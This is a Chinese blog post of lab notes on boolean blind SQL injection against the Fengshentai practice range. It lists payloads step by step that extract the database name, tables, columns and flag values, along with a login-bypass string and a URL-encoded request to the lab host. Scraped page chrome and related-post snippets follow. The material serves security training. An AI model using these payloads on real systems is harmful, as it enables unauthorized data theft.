封神台——训练营0基础学渗透测试

最新推荐文章于 2024-06-26 10:53:50 发布
最新推荐文章于 2024-06-26 10:53:50 发布
阅读量436 收藏 2
点赞数
分类专栏: 笔记 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51830687/article/details/119462547
版权

盲注-没有回显情况下SQL

SQL盲注——靶场A

1.判断数据库长度:and length(database())>4 12
2 .数据库名称:and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107
用burp进行爆破:开服务器,用本机的私网,注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongxia
3.判断有几个表名和表名长度:

and length(( select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0, 1)) >1 长度为6
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 1,1))>1 长度为4
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1))>1 长度为3

4.判断表名:

and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1),1,1)) = 1

108 111 102 108 97 103 --loflag
110 101 119 115 --news
117 115 101 114 --user
5.判断字段长度:

and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))=2
and length((select column_name from information_schema.columns where table_name='loflag' limit 1,1))=6

6.查询字段名:

and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1))>1 字段为id
and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))>1 字段为flaglo

7.查具体数据长度:

and length((select flaglo from loflag limit 0,1))=8
and length((select flaglo from loflag limit 1,1))=7
and length((select flaglo from loflag limit 2,1))=10
and length((select flaglo from loflag limit 3,1))=12
and length((select flaglo from loflag limit 4,1))=14

8.查具体数据:

 and ascii(substr((select flaglo from loflag limit 0,1),1,1))>1 --zKaQ-QQQ
 and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1 --zKaQ-RD
 and ascii(substr((select flaglo from loflag limit 2,1),1,1))>1 --zKaQ-Moren
 and ascii(substr((select flaglo from loflag limit 3,1),1,1))>1 --zKaQ-time-hj
 and ascii(substr((select flaglo from loflag limit 4,1),1,1))>1 --zKaQ-time-zxxz

SQL盲注——靶场B

1.判断是否注入注入:select *from news where id=“1” and 1=2 #"
2. 判断字段数长度:select *from news where id=“1” and length(database())=12 #"
3. 判断字段数:select *from news where id=“1” and ascii(substr(database) (),1,1))=107#"第一个字母为k
107 97 110 119 111 108 111 110 103 120 105 97 kanwolongxia
4.查表名得到loflag:

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1%22and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20%20table_schema=%27kanwolongxia%27%20limit%200,1),1,1))=108%23

5.查字段名flaglo:

"and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))=102%23

6.查询具体数据:

"and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1%23

flag为zKaQ-RD

SQL盲注——靶场C

用万能密码登入:’ or 1=1#
同前面步骤一样,只是换了一个传参

sparename
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
神台(尤里的复仇Ⅱ 回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4881
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
文件解析漏洞——神台漏洞靶场
m0_51442886的博客
06-09 1140
本文章禁止转发,如有雷同,后果自负
SQL盲注技术分享及dvwa靶场通关
最新发布
2301_79410179的博客
06-26 777
SQL注入是一种网络攻击技术,它利用Web应用程序对用户输入数据的合法性验证不足或过滤不严的漏洞,攻击者可以在应用程序中预定义的查询语句的结尾上添加恶意的SQL代码片段,从而欺骗数据库服务器执行非授权的任意查询,进一步获取数据库中的敏感信息或执行恶意操作。这里将布尔盲注又细分出了一个新的类型——报错盲注,这个报错盲注和我们通常说的报错注入是完全不同的东西,它的特点在于,当攻击者尝试注入SQL代码时,由于数据库查询的错误,错误信息会被返回给攻击者,进而泄露了数据库的结构或内容。
SQL盲注原理分析(超详细)(网络安全)
xiaoyang886_的博客
04-06 337
and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=97--+ 返回正常,说明数据库表名的第一个的第一位是a。and (ascii(substr(( select name from name limit 1,1),1,1)))=114--+返回正常,说明name列第一位是z。Ascii() 返回字符的Ascii码。
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 3311
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1613
1
神台基础关,第一关
weixin_44106116的博客
11-19 1754
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
C4D零基础到三维神课程-视频教程网盘链接提取码下载 .txt
03-18
C4D修神记:零基础到三维神,全球MotionAward评委、MOMENTOR创始人曾潇霖携手翼狐网主编谭天。行业名师帮你打基础,拒绝纸上谈兵。避免入门就入土,整套课程用16小时对5大具体案例进行剖析,让你省时省力轻松会C4...
神台 基础靶场 盲注1-3
weixin_46578840的博客
06-25 533
第一关 1 and 1=1 //正常 1 and 1=2 //空,数字型盲注 这里为了节约时间,用bp爆破 1 and length(database())=12,当前数据库长度为12 1+and+ascii(substr(database(),1,1))+=107 //第一位为k 1+and+ascii(substr(database(),2,1))+=97 //第二位为a 1+and+ascii(substr(database(),3,1))+=110 //第二位为n 1+and+ascii
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1550
神台靶场 | 布尔盲注 题目地址: 掌控安全SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
神台基础靶场 显错注入1-4
weixin_46578840的博客
06-24 305
第一题,单双引号没区别,可能不是字符型 1 and 1=1 //页面正常 1 and 1=2 //页面错误,数字型注入 判断列数 1 and 1=1 order by 1,2,3 //回显,存在三列。 判断回显位 1 and 1=2 union select 1,2,3 //23为回显位 注出当前数据库 1 and 1=2 union select 1,2,(database()) --+ 注表 1 and 1=2 union select 1,2,group_concat(table_name) fro
CTF解题-Bugku_Web_WriteUp (下)
道阻且长,行则将至。
08-16 3066
BugkuCTF 练习平台的 Web 题目往后越做越难……单独起新的博文记录该难度级别的题目。 No.1 Python脚本算数 题目“秋名山老司机”,查看解题链接: 百度知道这道题是快速反弹 POST请求,HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,若 key 值还在有效期内,则服务器返回最终的 flag,否则继续提示“请再加快速度!!!”。所以你别想手动传值了,必须使用python脚本了,python中有eval() 函数可以快速计算
神台尤里的复仇Ⅲ 渗透 看你是否能进入后台
j2941174356的博客
09-14 322
神台尤里的复仇Ⅲ 渗透 看你是否能进入后台
sqli-labs靶场实现(二)【不显示错误内容的盲注(布尔、时间)】(less-8~10、具体步骤+图文详解)
weixin_46709219的博客
12-14 719
一)不再显示不再显示错误的盲注   1)盲注介绍   2)get基于时间的盲注   3)get基于boolena的盲注   4)sqlmap安全测试 ———————————————————————————————————————————————————— 一)不再显示不再显示错误的盲注 1)盲注介绍 盲注(blind SQL)是注入攻击的其中一种,它通过向数据库发送true或者false并根据应用程序返回的信息判断结果,这种攻击的程序是因为本身在设置配置时就设计成只显示对错但并不显示解决SQL注入存在的
3.2 SQL盲注-时间注入--sql注入python脚本自动打印数据库信息
n0d_xy的博客
04-15 1338
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作习的环境----Linux环境...
DVWA靶场-sql盲注
zeroone的博客
03-11 1396
第八关:SQL Injection(Blind) 盲注       SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 Low <?php if( isset( $_GET[ 'Submit' ] )
(Windows10、XAMPP3.2.2、DVWA)搭建DVWA靶场&SQL注入&SQL盲注
coderge's CSDN Blog.
09-06 935
目录 一、任务内容 二、任务目的 三、参考方法 四、实验过程 4.1 了解SQL注入原理 4.2 Windows搭建dvwa环境 4.3 SQL注入实验过程 4.3.1 Low等级 4.3.2 Medium等级 4.3.3 High等级 4.3.4 Impossible等级 4.4 SQL盲注入实验过程 4.4.1 Low级别 4.4.2 Midium级别 4.4.3 High级别 4.4.4 Impossible级别 五、实验总结 参考链接: 任务1:熟悉SQL注入原
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和实例,帮助读者从初者成长为能够独立完成三维设计与制作的专业人士。 该书提供了C4D软件的下载地址,读者可以通过该链接下载安装C4D软件到自己的电脑中。安装完成后,读者可以按照书中的指导步骤,逐步习C4D的操作技巧和基本概念。从最基础的界面介绍、视图操作,到三维模型的建立、材质的添加、动画的制作等各个方面都有详细的讲解和实例演示。 随着阅读的深入,读者将习到更高级别的技巧和应用,如灯光设置、摄像机调整、特效制作等。作者通过生动的插图和实际案例,使读者能够更好地理解并掌握C4D的使用方法。 "C4D修神记:零基础到三维神"不仅可以帮助读者快速入门C4D软件,还能够启迪读者的创作灵感,提供了丰富的设计思路和技巧。这本书的出版对于有志于习和从事三维设计的读者来说是一次难得的机会和宝贵的参考资料。无论是对于初者还是对于有一定基础的人士来说,这本书都能够带领他们迈向更高的技能和创作水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sparename

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值